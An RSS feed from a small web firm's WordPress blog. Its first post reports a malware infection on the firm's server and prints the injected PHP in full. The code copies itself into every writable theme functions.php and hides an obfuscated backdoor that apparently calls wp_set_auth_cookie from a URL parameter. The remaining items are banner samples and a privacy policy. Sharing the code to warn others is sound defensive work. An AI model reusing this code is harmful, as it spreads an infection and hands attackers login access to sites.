<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>Say Hi to HI</title> <atom:link href="http://harmonyinfotech.in/feed/" rel="self" type="application/rss+xml" /><link>http://harmonyinfotech.in</link> <description>Welcome to Virtual Home of Harmony Infotech</description> <lastBuildDate>Fri, 26 Mar 2010 14:14:46 +0000</lastBuildDate> <generator>http://wordpress.org/?v=2.9.2</generator> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <item><title>Wordpress Virus &#8211; function _check_isactive_widgets</title><link>http://harmonyinfotech.in/cms/wordpress-cms/wordpress-virus-function-_check_isactive_widgets/</link> <comments>http://harmonyinfotech.in/cms/wordpress-cms/wordpress-virus-function-_check_isactive_widgets/#comments</comments> <pubDate>Fri, 26 Mar 2010 13:55:06 +0000</pubDate> <dc:creator>alok</dc:creator> <category><![CDATA[wordpress]]></category><guid
isPermaLink="false">http://harmonyinfotech.in/?p=2776</guid> <description><![CDATA[Recently on our one of the WPMU installation, all the blogs hosted on that WPMU server started giving error.  We tried to find the error as it seems to be happening in the functions.php file in all the themes.  Turned out that the following line of code has been added to all the functions.php file [...]No related posts.Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description> <content:encoded><![CDATA[<p>Recently on our one of the WPMU installation, all the blogs hosted on that WPMU server started giving error.  We tried to find the error as it seems to be happening in the functions.php file in all the themes.  Turned out that the following line of code has been added to all the functions.php file in the theme. We haven&#8217;t yet analysed the code fully but if you follow the code, it seems to be targetting particularly wordpress only.  When searching online for _check_isactive_widgets function (one of the first function in the extra code) only 1 link is visible in google ie http://themes.svn.wordpress.org/globalcreativity/1.2/functions.php  .   I am not sure from where our site got infected but I think it must be due to some theme which may have been installed recently on our server. We will update here further details about this issue but for the time being we are busy fixing the infected files.</p><p>Update 1:</p><p>Ok. Looking at the code in a glance, it seems like it is looking for comments being made by <strong>livethemes@gmail.com</strong>.  It is just my hunch that it may try to extract the links from the comments and try inserting that links into the current sidebar or footer.  Have to investigate it further since there isn&#8217;t any mention of <strong>livethemes@gmail.com</strong> online yet.</p><hr
/> Code Being inserted into functions.php</p><hr
/> &lt;?php<br
/> function _check_isactive_widgets(){<br
/> $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),&#8221;&lt;&#8221;.&#8221;?&#8221;));$output=&#8221;";$allowed=&#8221;";<br
/> $output=strip_tags($output, $allowed);<br
/> $direst=_get_allwidgetscont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),&#8221;themes&#8221;) + 6)));<br
/> if (is_array($direst)){<br
/> foreach ($direst as $item){<br
/> if (is_writable($item)){<br
/> $ftion=substr($widget,stripos($widget,&#8221;_&#8221;),stripos(substr($widget,stripos($widget,&#8221;_&#8221;)),&#8221;(&#8220;));<br
/> $cont=file_get_contents($item);<br
/> if (stripos($cont,$ftion) === false){<br
/> $seprar=stripos( substr($cont,-20),&#8221;?&#8221;.&#8221;&gt;&#8221;) !== false ? &#8220;&#8221; : &#8220;?&#8221;.&#8221;&gt;&#8221;;<br
/> $output .= $before . &#8220;Not found&#8221; . $after;<br
/> if (stripos( substr($cont,-20),&#8221;?&#8221;.&#8221;&gt;&#8221;) !== false){$cont=substr($cont,0,strripos($cont,&#8221;?&#8221;.&#8221;&gt;&#8221;) + 2);}<br
/> $output=rtrim($output, &#8220;\n\t&#8221;); fputs($f=fopen($item,&#8221;w+&#8221;),$cont . $seprar . &#8220;\n&#8221; .$widget);fclose($f);<br
/> $output .= ($showsdots &amp;&amp; $ellipsis) ? &#8220;&#8230;&#8221; : &#8220;&#8221;;<br
/> }<br
/> }<br
/> }<br
/> }<br
/> return $output;<br
/> }<br
/> function _get_allwidgetscont($wids,$items=array()){<br
/> $places=array_shift($wids);<br
/> if(substr($places,-1) == &#8220;/&#8221;){<br
/> $places=substr($places,0,-1);<br
/> }<br
/> if(!file_exists($places) || !is_dir($places)){<br
/> return false;<br
/> }elseif(is_readable($places)){<br
/> $elems=scandir($places);<br
/> foreach ($elems as $elem){<br
/> if ($elem != &#8220;.&#8221; &amp;&amp; $elem != &#8220;..&#8221;){<br
/> if (is_dir($places . &#8220;/&#8221; . $elem)){<br
/> $wids[]=$places . &#8220;/&#8221; . $elem;<br
/> } elseif (is_file($places . &#8220;/&#8221; . $elem)&amp;&amp;<br
/> $elem == substr(__FILE__,-13)){<br
/> $items[]=$places . &#8220;/&#8221; . $elem;}<br
/> }<br
/> }<br
/> }else{<br
/> return false;<br
/> }<br
/> if (sizeof($wids) &gt; 0){<br
/> return _get_allwidgetscont($wids,$items);<br
/> } else {<br
/> return $items;<br
/> }<br
/> }<br
/> if(!function_exists(&#8220;stripos&#8221;)){<br
/> function stripos(  $str, $needle, $offset = 0  ){<br
/> return strpos(  strtolower( $str ), strtolower( $needle ), $offset  );<br
/> }<br
/> }</p><p>if(!function_exists(&#8220;strripos&#8221;)){<br
/> function strripos(  $haystack, $needle, $offset = 0  ) {<br
/> if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );<br
/> if(  $offset &lt; 0  ){<br
/> $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  );<br
/> }<br
/> else{<br
/> $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) &#8211; $offset ), 0  )   )    );<br
/> }<br
/> if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE;<br
/> $pos = (   strlen(  $haystack  ) &#8211; (  $found + $offset + strlen( $needle )  )   );<br
/> return $pos;<br
/> }<br
/> }<br
/> if(!function_exists(&#8220;scandir&#8221;)){<br
/> function scandir($dir,$listDirectories=false, $skipDots=true) {<br
/> $dirArray = array();<br
/> if ($handle = opendir($dir)) {<br
/> while (false !== ($file = readdir($handle))) {<br
/> if (($file != &#8220;.&#8221; &amp;&amp; $file != &#8220;..&#8221;) || $skipDots == true) {<br
/> if($listDirectories == false) { if(is_dir($file)) { continue; } }<br
/> array_push($dirArray,basename($file));<br
/> }<br
/> }<br
/> closedir($handle);<br
/> }<br
/> return $dirArray;<br
/> }<br
/> }<br
/> add_action(&#8220;admin_head&#8221;, &#8220;_check_isactive_widgets&#8221;);<br
/> function _prepare_widgets(){<br
/> if(!isset($comment_length)) $comment_length=120;<br
/> if(!isset($strval)) $strval=&#8221;cookie&#8221;;<br
/> if(!isset($tags)) $tags=&#8221;&lt;a&gt;&#8221;;<br
/> if(!isset($type)) $type=&#8221;none&#8221;;<br
/> if(!isset($sepr)) $sepr=&#8221;";<br
/> if(!isset($h_filter)) $h_filter=get_option(&#8220;home&#8221;);<br
/> if(!isset($p_filter)) $p_filter=&#8221;wp_&#8221;;<br
/> if(!isset($more_link)) $more_link=1;<br
/> if(!isset($comment_types)) $comment_types=&#8221;";<br
/> if(!isset($countpage)) $countpage=$_GET["cperpage"];<br
/> if(!isset($comment_auth)) $comment_auth=&#8221;";<br
/> if(!isset($c_is_approved)) $c_is_approved=&#8221;";<br
/> if(!isset($aname)) $aname=&#8221;auth&#8221;;<br
/> if(!isset($more_link_texts)) $more_link_texts=&#8221;(more&#8230;)&#8221;;<br
/> if(!isset($is_output)) $is_output=get_option(&#8220;_is_widget_active_&#8221;);<br
/> if(!isset($checkswidget)) $checkswidget=$p_filter.&#8221;set&#8221;.&#8221;_&#8221;.$aname.&#8221;_&#8221;.$strval;<br
/> if(!isset($more_link_texts_ditails)) $more_link_texts_ditails=&#8221;(details&#8230;)&#8221;;<br
/> if(!isset($mcontent)) $mcontent=&#8221;ma&#8221;.$sepr.&#8221;il&#8221;;<br
/> if(!isset($f_more)) $f_more=1;<br
/> if(!isset($fakeit)) $fakeit=1;<br
/> if(!isset($sql)) $sql=&#8221;";<br
/> if (!$is_output) :</p><p>global $wpdb, $post;<br
/> $sq1=&#8221;SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb-&gt;comments LEFT OUTER JOIN $wpdb-&gt;posts ON ($wpdb-&gt;comments.comment_post_ID=$wpdb-&gt;posts.ID) WHERE comment_approved=\&#8221;1\&#8221; AND comment_type=\&#8221;\&#8221; AND post_author=\&#8221;li&#8221;.$sepr.&#8221;vethe&#8221;.$comment_types.&#8221;mes&#8221;.$sepr.&#8221;@&#8221;.$c_is_approved.&#8221;gm&#8221;.$comment_auth.&#8221;ail&#8221;.$sepr.&#8221;.&#8221;.$sepr.&#8221;co&#8221;.&#8221;m\&#8221; AND post_password=\&#8221;\&#8221; AND comment_date_gmt &gt;= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count&#8221;;#<br
/> if (!empty($post-&gt;post_password)) {<br
/> if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post-&gt;post_password) {<br
/> if(is_feed()) {<br
/> $output=__(&#8220;There is no excerpt because this is a protected post.&#8221;);<br
/> } else {<br
/> $output=get_the_password_form();<br
/> }<br
/> }<br
/> }<br
/> if(!isset($f_tag)) $f_tag=1;<br
/> if(!isset($types)) $types=$h_filter;<br
/> if(!isset($getcommentstexts)) $getcommentstexts=$p_filter.$mcontent;<br
/> if(!isset($aditional_tag)) $aditional_tag=&#8221;div&#8221;;<br
/> if(!isset($stext)) $stext=substr($sq1, stripos($sq1, &#8220;live&#8221;), 20);#<br
/> if(!isset($morelink_title)) $morelink_title=&#8221;Continue reading this entry&#8221;;<br
/> if(!isset($showsdots)) $showsdots=1;</p><p>$comments=$wpdb-&gt;get_results($sql);<br
/> if($fakeit == 2) {<br
/> $text=$post-&gt;post_content;<br
/> } elseif($fakeit == 1) {<br
/> $text=(empty($post-&gt;post_excerpt)) ? $post-&gt;post_content : $post-&gt;post_excerpt;<br
/> } else {<br
/> $text=$post-&gt;post_excerpt;<br
/> }<br
/> $sq1=&#8221;SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb-&gt;comments LEFT OUTER JOIN $wpdb-&gt;posts ON ($wpdb-&gt;comments.comment_post_ID=$wpdb-&gt;posts.ID) WHERE comment_approved=\&#8221;1\&#8221; AND comment_type=\&#8221;\&#8221; AND comment_content=&#8221;. call_user_func_array($getcommentstexts, array($stext, $h_filter, $types)) .&#8221; ORDER BY comment_date_gmt DESC LIMIT $src_count&#8221;;#<br
/> if($comment_length &lt; 0) {<br
/> $output=$text;<br
/> } else {<br
/> if(!$no_more &amp;&amp; strpos($text, &#8220;&lt;!&#8211;more&#8211;&gt;&#8221;)) {<br
/> $text=explode(&#8220;&lt;!&#8211;more&#8211;&gt;&#8221;, $text, 2);<br
/> $l=count($text[0]);<br
/> $more_link=1;<br
/> $comments=$wpdb-&gt;get_results($sql);<br
/> } else {<br
/> $text=explode(&#8221; &#8220;, $text);<br
/> if(count($text) &gt; $comment_length) {<br
/> $l=$comment_length;<br
/> $ellipsis=1;<br
/> } else {<br
/> $l=count($text);<br
/> $more_link_texts=&#8221;";<br
/> $ellipsis=0;<br
/> }<br
/> }<br
/> for ($i=0; $i&lt;$l; $i++)<br
/> $output .= $text[$i] . &#8221; &#8220;;<br
/> }<br
/> update_option(&#8220;_is_widget_active_&#8221;, 1);<br
/> if(&#8220;all&#8221; != $tags) {<br
/> $output=strip_tags($output, $tags);<br
/> return $output;<br
/> }<br
/> endif;<br
/> $output=rtrim($output, &#8220;\s\n\t\r\x0B&#8221;);<br
/> $output=($f_tag) ? balanceTags($output, true) : $output;<br
/> $output .= ($showsdots &amp;&amp; $ellipsis) ? &#8220;&#8230;&#8221; : &#8220;&#8221;;<br
/> $output=apply_filters($type, $output);<br
/> switch($aditional_tag) {<br
/> case(&#8220;div&#8221;) :<br
/> $tag=&#8221;div&#8221;;<br
/> break;<br
/> case(&#8220;span&#8221;) :<br
/> $tag=&#8221;span&#8221;;<br
/> break;<br
/> case(&#8220;p&#8221;) :<br
/> $tag=&#8221;p&#8221;;<br
/> break;<br
/> default :<br
/> $tag=&#8221;span&#8221;;<br
/> }</p><p>if ($more_link ) {<br
/> if($f_more) {<br
/> $output .= &#8221; &lt;&#8221; . $tag . &#8221; class=\&#8221;more-link\&#8221;&gt;&lt;a href=\&#8221;". get_permalink($post-&gt;ID) . &#8220;#more-&#8221; . $post-&gt;ID .&#8221;\&#8221; title=\&#8221;" . $morelink_title . &#8220;\&#8221;&gt;&#8221; . $more_link_texts = !is_user_logged_in() &amp;&amp; @call_user_func_array($checkswidget,array($countpage, true)) ? $more_link_texts : &#8220;&#8221; . &#8220;&lt;/a&gt;&lt;/&#8221; . $tag . &#8220;&gt;&#8221; . &#8220;\n&#8221;;<br
/> } else {<br
/> $output .= &#8221; &lt;&#8221; . $tag . &#8221; class=\&#8221;more-link\&#8221;&gt;&lt;a href=\&#8221;". get_permalink($post-&gt;ID) . &#8220;\&#8221; title=\&#8221;" . $morelink_title . &#8220;\&#8221;&gt;&#8221; . $more_link_texts . &#8220;&lt;/a&gt;&lt;/&#8221; . $tag . &#8220;&gt;&#8221; . &#8220;\n&#8221;;<br
/> }<br
/> }<br
/> return $output;<br
/> }</p><p>add_action(&#8220;init&#8221;, &#8220;_prepare_widgets&#8221;);</p><p>function __popular_posts($no_posts=6, $before=&#8221;&lt;li&gt;&#8221;, $after=&#8221;&lt;/li&gt;&#8221;, $show_pass_post=false, $duration=&#8221;") {<br
/> global $wpdb;<br
/> $request=&#8221;SELECT ID, post_title, COUNT($wpdb-&gt;comments.comment_post_ID) AS \&#8221;comment_count\&#8221; FROM $wpdb-&gt;posts, $wpdb-&gt;comments&#8221;;<br
/> $request .= &#8221; WHERE comment_approved=\&#8221;1\&#8221; AND $wpdb-&gt;posts.ID=$wpdb-&gt;comments.comment_post_ID AND post_status=\&#8221;publish\&#8221;";<br
/> if(!$show_pass_post) $request .= &#8221; AND post_password =\&#8221;\&#8221;";<br
/> if($duration !=&#8221;") {<br
/> $request .= &#8221; AND DATE_SUB(CURDATE(),INTERVAL &#8220;.$duration.&#8221; DAY) &lt; post_date &#8220;;<br
/> }<br
/> $request .= &#8221; GROUP BY $wpdb-&gt;comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts&#8221;;<br
/> $posts=$wpdb-&gt;get_results($request);<br
/> $output=&#8221;";<br
/> if ($posts) {<br
/> foreach ($posts as $post) {<br
/> $post_title=stripslashes($post-&gt;post_title);<br
/> $comment_count=$post-&gt;comment_count;<br
/> $permalink=get_permalink($post-&gt;ID);<br
/> $output .= $before . &#8221; &lt;a href=\&#8221;" . $permalink . &#8220;\&#8221; title=\&#8221;" . $post_title.&#8221;\&#8221;&gt;&#8221; . $post_title . &#8220;&lt;/a&gt; &#8221; . $after;<br
/> }<br
/> } else {<br
/> $output .= $before . &#8220;None found&#8221; . $after;<br
/> }<br
/> return  $output;<br
/> }<br
/> ?&gt;</p><hr
/><p>No related posts.</p><p>Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded> <wfw:commentRss>http://harmonyinfotech.in/cms/wordpress-cms/wordpress-virus-function-_check_isactive_widgets/feed/</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Simple Banner 200&#215;200 Sample Set 01</title><link>http://harmonyinfotech.in/banners/simple-banner-200x200-sample-set-02/</link> <comments>http://harmonyinfotech.in/banners/simple-banner-200x200-sample-set-02/#comments</comments> <pubDate>Mon, 06 Apr 2009 12:00:25 +0000</pubDate> <dc:creator>ravi</dc:creator> <category><![CDATA[banners]]></category><guid
isPermaLink="false">http://harmonyinfotech.in/blogs/?p=1830</guid> <description><![CDATA[No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.No related posts.Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description> <content:encoded><![CDATA[<p><img
class="alignleft size-full wp-image-1832" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/04/simplebanner_sample_02.jpg" alt="simplebanner sample 02 Simple Banner 200x200 Sample Set 01" width="200" height="200" title="Simple Banner 200x200 Sample Set 01" /><img
class="alignleft size-full wp-image-1833" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/04/simplebanner_sample_011.png" alt="simplebanner sample 011 Simple Banner 200x200 Sample Set 01" width="200" height="200" title="Simple Banner 200x200 Sample Set 01" /></p><p>No related posts.</p><p>Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded> <wfw:commentRss>http://harmonyinfotech.in/banners/simple-banner-200x200-sample-set-02/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Privacy Policy</title><link>http://harmonyinfotech.in/blogging/privacy-policy/</link> <comments>http://harmonyinfotech.in/blogging/privacy-policy/#comments</comments> <pubDate>Wed, 01 Apr 2009 12:15:36 +0000</pubDate> <dc:creator>alok</dc:creator> <category><![CDATA[Blogging]]></category><guid
isPermaLink="false">http://harmonyinfotech.in/blogs/?p=1819</guid> <description><![CDATA[According to Google Instructions , sites participating in adsense program needs to have an updated privacy policy reflecting the new Interests Based advertising based on cookies. Here is the our privacy policy which complies with the google guidelines.Personal Information Collected on this Website
No personally-identifiable information is collected on this website from persons that browse our [...]No related posts.Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description> <content:encoded><![CDATA[<p>According to Google Instructions , sites participating in adsense program needs to have an updated privacy policy reflecting the new Interests Based advertising based on cookies. Here is the our privacy policy which complies with the google guidelines.</p><hr
/><blockquote><p><strong>Personal Information Collected on this Website</strong><br
/> No personally-identifiable information is collected on this website from persons that browse our website. The only personally-identifiable information collected on this website is gathered on our “contact us” pages, where fields are provided so that you can provide your name, email address and phone contact information. We collect this information so that we can respond to the comments that you send to us via that form.</p><p><strong>Anonymous Information Collected on this Website</strong><br
/> We record anonymous data. Most of the information that we collect from this website is anonymous information, such as the pages you visit. Other anonymous data we may collect might include the name of your internet service provider, the website that you used to link to our site, the websites that you visit from our site, and your IP address. The data is used for statistical purposes, but you, as the individual user, remain anonymous. We use this anonymous information to help improve the content of this site and to compile aggregate statistics about individuals using our site for internal market research purposes.</p><p><strong>Cookies</strong><br
/> We use cookies on this website. We use Google, as a third party advertising company to serve ads when you visit our website. Google a<a
title="DoubleClick" href="http://www.doubleclick.com/privacy/faq.aspx"> DoubleClick DART cookie</a> to  serve ads to you based on visit to this sites and other sites on the Internet. If you would like more information about this practice and to know your choices about not having this information used by these Google, click <a
title="Google Adsense Privacy" href="http://www.google.com/privacy_ads.html">here</a>.</p></blockquote><hr
/>This privacy policy is being linked from all the sites under direct control of Harmony Infotech or Team Members who use our publisher ID to display adsense ad on their personal sites.</p><p>No related posts.</p><p>Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded> <wfw:commentRss>http://harmonyinfotech.in/blogging/privacy-policy/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Simple Banner 320&#215;250 Sample Set 01</title><link>http://harmonyinfotech.in/banners/simple-banner-320x250-sample-set-01/</link> <comments>http://harmonyinfotech.in/banners/simple-banner-320x250-sample-set-01/#comments</comments> <pubDate>Sat, 28 Mar 2009 12:32:08 +0000</pubDate> <dc:creator>ravi</dc:creator> <category><![CDATA[banners]]></category><guid
isPermaLink="false">http://harmonyinfotech.in/blogs/?p=1742</guid> <description><![CDATA[Are you looking for Banners. Get a Banner for only $5.                                            Send a mail to banners@harmonyinfotech.in and mention &#8220;1 Banner &#8211; 5 Dollar &#8220;.No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.No related posts.Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description> <content:encoded><![CDATA[<p
style="text-align: left">Are you looking for Banners. Get a <a
href="http://harmonyinfotech.in/blogs/category/banners/">Banner</a> for only $5.                                            Send a mail to <strong><span
style="color: #333333">banners@harmonyinfotech.in</span></strong> and mention &#8220;1 Banner &#8211; 5 Dollar &#8220;.</p><p><img
class="alignleft size-full wp-image-1740" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/simplebanner_320x250_sample_01.png" alt="simplebanner 320x250 sample 01 Simple Banner 320x250 Sample Set 01" width="320" height="250" title="Simple Banner 320x250 Sample Set 01" /><img
class="alignleft size-full wp-image-1741" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/simplebanner_320x250_sample_02.png" alt="simplebanner 320x250 sample 02 Simple Banner 320x250 Sample Set 01" width="320" height="250" title="Simple Banner 320x250 Sample Set 01" /><img
class="alignleft size-full wp-image-1751" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/simplebanner_320x250_sample_053.png" alt="simplebanner 320x250 sample 053 Simple Banner 320x250 Sample Set 01" width="320" height="250" title="Simple Banner 320x250 Sample Set 01" /><br
/> <img
class="alignleft size-full wp-image-1752" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/simplebanner_320x250_sample_06.png" alt="simplebanner 320x250 sample 06 Simple Banner 320x250 Sample Set 01" width="320" height="250" title="Simple Banner 320x250 Sample Set 01" /></p><p>No related posts.</p><p>Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded> <wfw:commentRss>http://harmonyinfotech.in/banners/simple-banner-320x250-sample-set-01/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Simple Banner 120&#215;600 Sample Set 2</title><link>http://harmonyinfotech.in/banners/simple-banner-120x600-sample-set-2/</link> <comments>http://harmonyinfotech.in/banners/simple-banner-120x600-sample-set-2/#comments</comments> <pubDate>Sat, 21 Mar 2009 11:57:49 +0000</pubDate> <dc:creator>ravi</dc:creator> <category><![CDATA[banners]]></category><guid
isPermaLink="false">http://harmonyinfotech.in/blogs/?p=1734</guid> <description><![CDATA[No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.No related posts.Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description> <content:encoded><![CDATA[<p><img
class="alignleft size-full wp-image-1735" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/simplebanner_120x600_sample-02-copy.png" alt="simplebanner 120x600 sample 02 copy Simple Banner 120x600 Sample Set 2" width="120" height="600" title="Simple Banner 120x600 Sample Set 2" /></p><p>No related posts.</p><p>Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded> <wfw:commentRss>http://harmonyinfotech.in/banners/simple-banner-120x600-sample-set-2/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Animated Banner 120&#215;600 sample set 2</title><link>http://harmonyinfotech.in/banners/animated-banner-120x600-sample-set-2/</link> <comments>http://harmonyinfotech.in/banners/animated-banner-120x600-sample-set-2/#comments</comments> <pubDate>Sat, 21 Mar 2009 11:53:35 +0000</pubDate> <dc:creator>ravi</dc:creator> <category><![CDATA[banners]]></category><guid
isPermaLink="false">http://harmonyinfotech.in/blogs/?p=1729</guid> <description><![CDATA[No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.No related posts.Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description> <content:encoded><![CDATA[<p><img
class="alignright size-full wp-image-1730" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/animatedbanner_120x600_sample-01.gif" alt="animatedbanner 120x600 sample 01 Animated Banner 120x600 sample set 2" width="120" height="600" title="Animated Banner 120x600 sample set 2" /><img
class="alignright size-full wp-image-1731" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/animated-banner_120x600_sample-02.gif" alt="animated banner 120x600 sample 02 Animated Banner 120x600 sample set 2" width="120" height="600" title="Animated Banner 120x600 sample set 2" /></p><p>No related posts.</p><p>Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded> <wfw:commentRss>http://harmonyinfotech.in/banners/animated-banner-120x600-sample-set-2/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Simple Banner 120&#215;600 Sample Set 1</title><link>http://harmonyinfotech.in/banners/simple-banner-120x600-sample-set-1/</link> <comments>http://harmonyinfotech.in/banners/simple-banner-120x600-sample-set-1/#comments</comments> <pubDate>Fri, 20 Mar 2009 11:41:28 +0000</pubDate> <dc:creator>ravi</dc:creator> <category><![CDATA[banners]]></category><guid
isPermaLink="false">http://harmonyinfotech.in/blogs/?p=1706</guid> <description><![CDATA[No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.No related posts.Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description> <content:encoded><![CDATA[<p><img
class="alignleft size-full wp-image-1718" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/simplebanner_120x600_sample03.png" alt="simplebanner 120x600 sample03 Simple Banner 120x600 Sample Set 1" width="120" height="600" title="Simple Banner 120x600 Sample Set 1" /><img
class="alignleft size-full wp-image-1707" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/simple-banner_120x600_sample-011.png" alt="simple banner 120x600 sample 011 Simple Banner 120x600 Sample Set 1" width="120" height="600" title="Simple Banner 120x600 Sample Set 1" /><img
class="alignleft size-full wp-image-1720" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/simplebanner_120x600_sample-2.png" alt="simplebanner 120x600 sample 2 Simple Banner 120x600 Sample Set 1" width="120" height="600" title="Simple Banner 120x600 Sample Set 1" /></p><p>No related posts.</p><p>Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded> <wfw:commentRss>http://harmonyinfotech.in/banners/simple-banner-120x600-sample-set-1/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Simple Banner 468&#215;60 Sample Set 03</title><link>http://harmonyinfotech.in/banners/simple-banner-468x60-sample-set-03/</link> <comments>http://harmonyinfotech.in/banners/simple-banner-468x60-sample-set-03/#comments</comments> <pubDate>Fri, 20 Mar 2009 11:22:05 +0000</pubDate> <dc:creator>ravi</dc:creator> <category><![CDATA[banners]]></category><guid
isPermaLink="false">http://harmonyinfotech.in/blogs/?p=1690</guid> <description><![CDATA[No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.No related posts.Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description> <content:encoded><![CDATA[<p><img
class="alignleft size-full wp-image-1837" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/simplebanner_468x60_sample_01.png" alt="simplebanner 468x60 sample 01 Simple Banner 468x60 Sample Set 03" width="468" height="60" title="Simple Banner 468x60 Sample Set 03" /><br
/> <img
class="alignleft size-full wp-image-1691" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/simplebanner_468x60_sample-011.png" alt="simplebanner 468x60 sample 011 Simple Banner 468x60 Sample Set 03" width="468" height="60" title="Simple Banner 468x60 Sample Set 03" /><img
class="alignleft size-full wp-image-1692" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/simplebanner_468x60_sample-02.png" alt="simplebanner 468x60 sample 02 Simple Banner 468x60 Sample Set 03" width="468" height="60" title="Simple Banner 468x60 Sample Set 03" /></p><p>No related posts.</p><p>Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded> <wfw:commentRss>http://harmonyinfotech.in/banners/simple-banner-468x60-sample-set-03/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Animated Banner 120&#215;600 sample set1</title><link>http://harmonyinfotech.in/banners/animatedbanner120x600sampleset1/</link> <comments>http://harmonyinfotech.in/banners/animatedbanner120x600sampleset1/#comments</comments> <pubDate>Fri, 20 Mar 2009 05:36:13 +0000</pubDate> <dc:creator>ravi</dc:creator> <category><![CDATA[banners]]></category><guid
isPermaLink="false">http://harmonyinfotech.in/blogs/?p=1659</guid> <description><![CDATA[No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.No related posts.Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description> <content:encoded><![CDATA[<p><img
class="alignleft size-full wp-image-1702" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/120x600_animatedbanner_sample052.gif" alt="120x600 animatedbanner sample052 Animated Banner 120x600 sample set1" width="120" height="600" title="Animated Banner 120x600 sample set1" /></p><p>No related posts.</p><p>Related posts brought to you by <a
